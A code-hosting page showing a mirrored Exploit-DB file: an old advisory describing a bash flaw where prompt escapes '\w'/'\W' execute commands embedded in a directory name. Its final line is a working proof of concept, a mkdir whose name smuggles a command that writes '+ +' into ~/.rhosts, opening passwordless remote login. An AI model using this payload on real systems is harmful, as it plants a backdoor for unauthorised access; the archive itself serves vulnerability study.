bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/19095.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

9 lines
No EOL
598 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/119/info
A vulnerability in bash may allow inadvertently running commands embedded in the path to the currently working directory.
If an unsuspecting user enters a directory created by some malicious user with embedded commands, and their prompt (PS1) contains '\w' or '\W', and the prompt is displayed the commands will be executed. The vulnerability is in the parsing of the '\w' and '\W' escape codes.
As the prompt must be displayed unattended shell scripts are not vulnerable.
mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\` "
Reference in a new issue View git blame Copy permalink